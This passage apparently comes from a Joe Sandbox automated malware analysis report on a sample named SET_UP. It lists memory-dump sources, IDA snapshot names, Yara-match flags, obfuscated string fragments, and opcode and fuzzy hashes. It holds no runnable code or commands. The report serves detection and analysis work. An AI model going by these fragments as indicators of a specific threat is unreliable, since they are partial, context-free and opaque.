                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID: Lg$b}$jg`!$kz$tW
                                                                                                            • API String ID: 2994545307-2384483204
                                                                                                            • Opcode ID: 9245a1da7e04e9793f5a276a8516d071a31c6dc4924eb54edaa54c44e666873f
                                                                                                            • Instruction ID: e3c1f344dbfeb99c5204e7b6377872c9662fafe35da6d73adddc150b8122bec1
                                                                                                            • Opcode Fuzzy Hash: 9245a1da7e04e9793f5a276a8516d071a31c6dc4924eb54edaa54c44e666873f
                                                                                                            • Instruction Fuzzy Hash: 1AB20631A583019BD7249E68CC947BABBD2EB85324F2DC62CD9EA873C1D7759C05CB81
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Lg$b}$jg`!$kz$tW
                                                                                                            • API String ID: 0-2384483204
                                                                                                            • Opcode ID: 711126b66ef56acedd2cc53173de36422ac1e71e2b7f20df4f9cca32a026ed62
                                                                                                            • Instruction ID: d418fa9f55a0a475ba75e566f50c3837dd7b97bf7b1b3da87f496e5e68123781
                                                                                                            • Opcode Fuzzy Hash: 711126b66ef56acedd2cc53173de36422ac1e71e2b7f20df4f9cca32a026ed62
                                                                                                            • Instruction Fuzzy Hash: 4CB205356483109BEB248F68CC8476BBBD2FBC5325F1D8A3DD9E683391D775A8058B81
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: C\ZZ$FRSC$U$V[_Y$mJUB$|X<e
                                                                                                            • API String ID: 0-3136087342
                                                                                                            • Opcode ID: 2caea914575da3f86dbb341a691f3c022894a801348eba1ca893dfe8e1bff207
                                                                                                            • Instruction ID: f9b46a1ff61e34032258a3323e4027c43bc0d3eed2846ad741f5d066f82b1523
                                                                                                            • Opcode Fuzzy Hash: 2caea914575da3f86dbb341a691f3c022894a801348eba1ca893dfe8e1bff207
                                                                                                            • Instruction Fuzzy Hash: D391DCB440C7908FE3118F2994A066BBFE1EFD2704F199A4CE9D45B356C376880ACB57
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: C\ZZ$FRSC$U$V[_Y$mJUB$|X<e
                                                                                                            • API String ID: 0-3136087342
                                                                                                            • Opcode ID: 9730962d069dbfac607f7bbb50c3c41fd3dd2c957368d6321b9ef7537ef78ddb
                                                                                                            • Instruction ID: 3b7100a11744afbf1bd9d954a56b20c6042f049229d25e9fc2203fa88ef01cec
                                                                                                            • Opcode Fuzzy Hash: 9730962d069dbfac607f7bbb50c3c41fd3dd2c957368d6321b9ef7537ef78ddb
                                                                                                            • Instruction Fuzzy Hash: 9D91ECB440C3D08FE3118F29949026BBFE1EFD2704F19999DE6E45B356D376880ACB96
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: _9Y$FG$iJ$tr$yw
                                                                                                            • API String ID: 0-135212495
                                                                                                            • Opcode ID: 3fb150e69c1e6c7c6e005072b3b5a060fd6bc2634a9f7203d90253d71174f80b
                                                                                                            • Instruction ID: c535c21847022ebaefc548a51c37c50c1738523209786217f450d87dd31830c3
                                                                                                            • Opcode Fuzzy Hash: 3fb150e69c1e6c7c6e005072b3b5a060fd6bc2634a9f7203d90253d71174f80b
                                                                                                            • Instruction Fuzzy Hash: C7C124B56083808BD715CF6488A16EFBBE6EFC2314F18492CE5D58B391C779D90ACB52
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: _9Y$FG$iJ$tr$yw
                                                                                                            • API String ID: 0-135212495
                                                                                                            • Opcode ID: f3f3bc2c8e8d77aa418c7898faa976fd6c05a70bd1ccea610825d8859e66948f
                                                                                                            • Instruction ID: 96adb429fc9a87f1d6552e8945880361b0814f231a6e2fc090df2a10fac05742
                                                                                                            • Opcode Fuzzy Hash: f3f3bc2c8e8d77aa418c7898faa976fd6c05a70bd1ccea610825d8859e66948f
                                                                                                            • Instruction Fuzzy Hash: 21C126B26083408BD714CF65C8A17AFBBE2EBC2318F18496DE0D58B391D779C50ACB52
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: @A$OIKS$U$wY;[$rp
                                                                                                            • API String ID: 0-437407314
                                                                                                            • Opcode ID: 9be3a8e19b410b39778263171320d97face1be5169bd05b822c7495be98a307e
                                                                                                            • Instruction ID: 9d34d28d45400620f42d6a4be108ca8e3b37a3c69bfdd37bbabd5993c6b08c12
                                                                                                            • Opcode Fuzzy Hash: 9be3a8e19b410b39778263171320d97face1be5169bd05b822c7495be98a307e
                                                                                                            • Instruction Fuzzy Hash: F5B1D17160C3505BD324DF28C4A16AFFBE3ABC2608F18892EE4D54F352D7759806CB86
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: GG$IB$M|$XJ
                                                                                                            • API String ID: 0-3590484091
                                                                                                            • Opcode ID: c914224fc9f19cf87266781270206f0f31e1f991191065d40b304b3f84b5473c
                                                                                                            • Instruction ID: 49d8ef7f56ebccb687ca3f42cc7135eb52aa9b3d564cc0529b61d11a210e81db
                                                                                                            • Opcode Fuzzy Hash: c914224fc9f19cf87266781270206f0f31e1f991191065d40b304b3f84b5473c
                                                                                                            • Instruction Fuzzy Hash: 9F9148B5D102128BCB28CF28C8513BB77B1FF55320B29965ED9969B3D5E7789C02CB90
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: GG$IB$M|$XJ
                                                                                                            • API String ID: 0-3590484091
                                                                                                            • Opcode ID: 7345e8f7de03d4b92fda4999b4e74bc6fa9f1a70d34260eb5de5721e9c4e1a56
                                                                                                            • Instruction ID: f5982cf6883c4c05a0e5b3c80d4aa2c570c152ad0f51701b0bced7ea1a443226
                                                                                                            • Opcode Fuzzy Hash: 7345e8f7de03d4b92fda4999b4e74bc6fa9f1a70d34260eb5de5721e9c4e1a56
                                                                                                            • Instruction Fuzzy Hash: 2B9104B1E00611CBDF288F29C8513BB77B1FF56321B19865ED8939B395E7789901CB81
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: !@$,$o
                                                                                                            • API String ID: 0-388183547
                                                                                                            • Opcode ID: 5367770e63f322fc3eb97c8cb9b66404a5c400d9d5031733d821504a4f26422a
                                                                                                            • Instruction ID: 5e68b368dc206ccf337706db4fbfd11f6941db69bdf05b364655d01240dd77bf
                                                                                                            • Opcode Fuzzy Hash: 5367770e63f322fc3eb97c8cb9b66404a5c400d9d5031733d821504a4f26422a
                                                                                                            • Instruction Fuzzy Hash: 79227C7150C7818FD364DF28C45436FBBE1ABC6324F184A6EE6E687391D7B58881CB52
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 8~9*$G"&M$N?>K
                                                                                                            • API String ID: 0-2086580974
                                                                                                            • Opcode ID: bb8b750a52ce1f3866b4b0c2bcfbb0b2d55d08120fdd0b624b30cc7c7c15a72f
                                                                                                            • Instruction ID: 978308bda1481cb75d4d032e45f9a3d77b0e22c32d3f0edd8188119aee59d275
                                                                                                            • Opcode Fuzzy Hash: bb8b750a52ce1f3866b4b0c2bcfbb0b2d55d08120fdd0b624b30cc7c7c15a72f
                                                                                                            • Instruction Fuzzy Hash: B1916676A143009BE7508F29DC81B6BB3E2EFC5714F19892EDA8587341E778E805C792
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 7$gfff$ol
                                                                                                            • API String ID: 0-3502495008
                                                                                                            • Opcode ID: db4f525ff97c7fcbae7e0738655c47d6f3a2da7757461ffdc0092eb979eb2a06
                                                                                                            • Instruction ID: c067c903b076c3f9a8392cb04a1e232ef2799447d57f30f75bd0c6cb31785844
                                                                                                            • Opcode Fuzzy Hash: db4f525ff97c7fcbae7e0738655c47d6f3a2da7757461ffdc0092eb979eb2a06
                                                                                                            • Instruction Fuzzy Hash: 95A12373A246514BD318CE28CC517AAB6D7ABC4324F1D8B3DD5AAC7385DB78D8028781
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 7$gfff$ol
                                                                                                            • API String ID: 0-3502495008
                                                                                                            • Opcode ID: 1867b80820388d4c3826c75788b7ab53db3dbe37c2de035b0351b0b31f942023
                                                                                                            • Instruction ID: cc750eb53b2932bb8b7b50df2786a6873e695e5c19c57c33c6b8d8d639cf589b
                                                                                                            • Opcode Fuzzy Hash: 1867b80820388d4c3826c75788b7ab53db3dbe37c2de035b0351b0b31f942023
                                                                                                            • Instruction Fuzzy Hash: 36A13677A146504BE718CE28CC517ABB6D3ABC5324F1D8B3ED4A6CB3D5DB7898028781
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ";>/$20.'$a
                                                                                                            • API String ID: 0-2249371168
                                                                                                            • Opcode ID: 2fee9a6e2182154100c392decf18a3c270e9d4dd1d87a43e3727a2a3d5fb026f
                                                                                                            • Instruction ID: 30fa015da9ccffa918706956bed17724fd0379d3f5c6c88320e99b0fd18f3ef5
                                                                                                            • Opcode Fuzzy Hash: 2fee9a6e2182154100c392decf18a3c270e9d4dd1d87a43e3727a2a3d5fb026f
                                                                                                            • Instruction Fuzzy Hash: 6C4147726583815BE714CF28D8D1B9BBBE2ABD2314F14896CF1C197391D6B5C806CB92
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ";>/$20.'$a
                                                                                                            • API String ID: 0-2249371168
                                                                                                            • Opcode ID: c4a66a28fe0369cada7564f4759d9d7dc1abbc6c7164e97c40a70f5a353c9d7e
                                                                                                            • Instruction ID: f26160302cefed8cec2621945e7a277415e770b0ce401669b587587db85026e7
                                                                                                            • Opcode Fuzzy Hash: c4a66a28fe0369cada7564f4759d9d7dc1abbc6c7164e97c40a70f5a353c9d7e
                                                                                                            • Instruction Fuzzy Hash: A74179726583805BE714CF28CCD1B9BFBE2ABD2315F14896DF0C1972E1D6B5C8058B92
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: *l&R$TZ$X^
                                                                                                            • API String ID: 0-3101560737
                                                                                                            • Opcode ID: 29b3598927d6268311299363a6c6fd3daf066aec72a0a18705815edd31707dd8
                                                                                                            • Instruction ID: d8519778182580d9923b96304f1f3fd426e8b528227fd72e0ed33ce8f40d0fde
                                                                                                            • Opcode Fuzzy Hash: 29b3598927d6268311299363a6c6fd3daf066aec72a0a18705815edd31707dd8
                                                                                                            • Instruction Fuzzy Hash: 55419AB0A1C3D08BD230DF559801B9BBBA6FBC2244F059A2CD5C96B342D7398906CB97
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: *l&R$TZ$X^
                                                                                                            • API String ID: 0-3101560737
                                                                                                            • Opcode ID: 799c0ca95d06885689e61616ec8e1396f65c058db2cb324c1893f6175708863f
                                                                                                            • Instruction ID: f2f54dfc27e20fa4548514613b03dd03d1d80d559e9936fdd3319927f1126c14
                                                                                                            • Opcode Fuzzy Hash: 799c0ca95d06885689e61616ec8e1396f65c058db2cb324c1893f6175708863f
                                                                                                            • Instruction Fuzzy Hash: 0A4189B061C3908BD230DF559801B9BBBA5FBC2248F059A2DD5C96B242D7398906CB5B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $vt$~|
                                                                                                            • API String ID: 0-3628718825
                                                                                                            • Opcode ID: db3d0798af4b7868331b086eb516c53603d78d6ddd657adf9f74ff3b6a7b7bc4
                                                                                                            • Instruction ID: b24bbf9e52589177f7e99f028ee1d4e126b14db1fa816a0245e76cb947c632bb
                                                                                                            • Opcode Fuzzy Hash: db3d0798af4b7868331b086eb516c53603d78d6ddd657adf9f74ff3b6a7b7bc4
                                                                                                            • Instruction Fuzzy Hash: 880249B1D20612CBCB14CF68C8922A6B7B2FF85320B29925ED9559B7D5E374DC12CBD0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: KH$3
                                                                                                            • API String ID: 0-2727323288
                                                                                                            • Opcode ID: 2beac4408f571b0fabd37271fc1dbf3442788c3bd4f01b8f6f8184273c98ee7f
                                                                                                            • Instruction ID: 35d88638c4a599afd42a401f998098ac85ae6d11f55163d2ff7ed15afbcef4b4
                                                                                                            • Opcode Fuzzy Hash: 2beac4408f571b0fabd37271fc1dbf3442788c3bd4f01b8f6f8184273c98ee7f
                                                                                                            • Instruction Fuzzy Hash: E8E15876A083518BD7248F25C8D2367B7E2EFD6314F29956DE8C69B390D674CC02C792
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $vt$~|
                                                                                                            • API String ID: 0-3628718825
                                                                                                            • Opcode ID: 0982218a8fb779dbef0e960a9e1b060d17eeec85a73b98696b8b2a2d077ba547
                                                                                                            • Instruction ID: e72bd895d147dbc2cfe38d2e1c9cc4ab69cdd71cd4de3e21305a303f9bd5f31b
                                                                                                            • Opcode Fuzzy Hash: 0982218a8fb779dbef0e960a9e1b060d17eeec85a73b98696b8b2a2d077ba547
                                                                                                            • Instruction Fuzzy Hash: D80247B1E10611CBDB14CF69C8922ABB7B1FF85320B19966ED8565B3C9E374D812CBD0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: KH$3
                                                                                                            • API String ID: 0-2727323288
                                                                                                            • Opcode ID: fa0791cb1688cb5d1780b836a89e88780a5ccd0a1c6195f65d9ecd9a18948455
                                                                                                            • Instruction ID: 0b4690313f0b25fb4b16dc0a050ee8ae6f705888e0d7fa51894922a1bc1bebf1
                                                                                                            • Opcode Fuzzy Hash: fa0791cb1688cb5d1780b836a89e88780a5ccd0a1c6195f65d9ecd9a18948455
                                                                                                            • Instruction Fuzzy Hash: FFE15776A083108BDB24CF29C8D1367B7E2EFD6315F19956DE8C79B394E67488018792
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID: LMOO$f
                                                                                                            • API String ID: 2994545307-2226343953
                                                                                                            • Opcode ID: def3912098746de081565eaef3c5a22746e7416e0b0f49a6d5d0b328da4f2daf
                                                                                                            • Instruction ID: ac14ef5bb5cf96716c102eb5e900d89102e9d89bdb0f55221f52aaa6c33a783b
                                                                                                            • Opcode Fuzzy Hash: def3912098746de081565eaef3c5a22746e7416e0b0f49a6d5d0b328da4f2daf
                                                                                                            • Instruction Fuzzy Hash: 0022D2716083418FDB15DF14C890B6AB7E2FBC4318F188A6DE5A69B391D770ED06CB92
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: LMOO$f
                                                                                                            • API String ID: 0-2226343953
                                                                                                            • Opcode ID: 9e2cbea5499f786b0dc9ddec88863d1c12f59fa0a4f6fee86ecc43003fa16362
                                                                                                            • Instruction ID: b69a74101bc27747794a22e368de87ed8328d8db11962fd5527cec235143462e
                                                                                                            • Opcode Fuzzy Hash: 9e2cbea5499f786b0dc9ddec88863d1c12f59fa0a4f6fee86ecc43003fa16362
                                                                                                            • Instruction Fuzzy Hash: D322E2716093419FD714CF58CC90A6BBBF2FBC5318F188A6CE4A58B291DB74E905CB86
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Hlm"$Hlm"
                                                                                                            • API String ID: 0-2317161985
                                                                                                            • Opcode ID: b9028f08f58c470a7dff974e8377e7f4f1bb12a8afcff5b499d381db8a844314
                                                                                                            • Instruction ID: 07c399b1ef945e35c5e977b6a419aa123b44d4f6ba0d95af92218292f1ab1836
                                                                                                            • Opcode Fuzzy Hash: b9028f08f58c470a7dff974e8377e7f4f1bb12a8afcff5b499d381db8a844314
                                                                                                            • Instruction Fuzzy Hash: CBF101765093638BC7208F25C4806ABB7F1FF89754F29965DE8C49B3A0E7309D42CB95
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Hlm"$Hlm"
                                                                                                            • API String ID: 0-2317161985
                                                                                                            • Opcode ID: 422c22d51023a5cc5fcce44033a0ffd66f4feb2417abf39a9db74bfbef76c21c
                                                                                                            • Instruction ID: f14d28ef4301db7174fcf2dbde49010c540e8bcaa87b507e6e15806b2e078577
                                                                                                            • Opcode Fuzzy Hash: 422c22d51023a5cc5fcce44033a0ffd66f4feb2417abf39a9db74bfbef76c21c
                                                                                                            • Instruction Fuzzy Hash: A6F177765083528BDB20CF25C4C06ABB7F1FF89765F158A5EE8C59B3A1E7308941C745
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Hlm"$Hlm"
                                                                                                            • API String ID: 0-2317161985
                                                                                                            • Opcode ID: 3154f98fbb22ca438b72a962a78de64074490a728277eb59b779d99ad2c2948d
                                                                                                            • Instruction ID: c243707babd53a5f44b7a59cf691d1d44fd6fdca1b59d7a9a4a0181b394a8d63
                                                                                                            • Opcode Fuzzy Hash: 3154f98fbb22ca438b72a962a78de64074490a728277eb59b779d99ad2c2948d
                                                                                                            • Instruction Fuzzy Hash: A8914471A083238BD7248F25C4806BBB7F1EF95754F24966DE8C49B390E7308D52CB96
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Hlm"$Hlm"
                                                                                                            • API String ID: 0-2317161985
                                                                                                            • Opcode ID: 4f52132ae8a1ace19dfa8c7470c8f6f43756895412ca83fae581d86c6f300de2
                                                                                                            • Instruction ID: 5c780ed806bcfd51942ca4a03a42d76a76f6048772deb06e1fe4e261a733c482
                                                                                                            • Opcode Fuzzy Hash: 4f52132ae8a1ace19dfa8c7470c8f6f43756895412ca83fae581d86c6f300de2
                                                                                                            • Instruction Fuzzy Hash: FB9189B56083628BDB20CF35C4806ABB7F1EF95755F248A6EE8C59B390E3308902C745
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: )$IEND
                                                                                                            • API String ID: 0-707183367
                                                                                                            • Opcode ID: 4d586663d41809bb88ac175fe14339e9e19f9eb1207e45b1871bb33f4038f123
                                                                                                            • Instruction ID: fd83c3331f36637f3ba01c76b4202ace67ea7ee0fe23bbf937a3741d8cc2bd40
                                                                                                            • Opcode Fuzzy Hash: 4d586663d41809bb88ac175fe14339e9e19f9eb1207e45b1871bb33f4038f123
                                                                                                            • Instruction Fuzzy Hash: FFD19CB1908344DFE721CF14D865B9ABBE5EF94304F04492DF99A9B382D375E908CB92
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: )$IEND
                                                                                                            • API String ID: 0-707183367
                                                                                                            • Opcode ID: 1e23b13eda99143864caa94d556a4ec5936cb9bce07703e79da553f4784a01fa
                                                                                                            • Instruction ID: 6c5582837a5b881b7feab5cd8cba45a9ad0d59803627cc32831d4a549ac19a7b
                                                                                                            • Opcode Fuzzy Hash: 1e23b13eda99143864caa94d556a4ec5936cb9bce07703e79da553f4784a01fa
                                                                                                            • Instruction Fuzzy Hash: B0D1DEB1508344DFD720CF28C890B5BBBE0EB94308F44892EF9999B381D775E948CB92
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: D$^_
                                                                                                            • API String ID: 0-3583689461
                                                                                                            • Opcode ID: 9f183f8e24aad80ef5b7e48c41dc6ba3d7ac8ee32d5477ff57516a59b3a58e5a
                                                                                                            • Instruction ID: ad04b249646eac0ba05b2d4ed6975574e125f5d32ef34a188f38434155a627f5
                                                                                                            • Opcode Fuzzy Hash: 9f183f8e24aad80ef5b7e48c41dc6ba3d7ac8ee32d5477ff57516a59b3a58e5a
                                                                                                            • Instruction Fuzzy Hash: F9A18AB11083418AD324CF25C4A176BBBF1FFC5318F198A6DD4895B3A1E7B8C945CB96
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
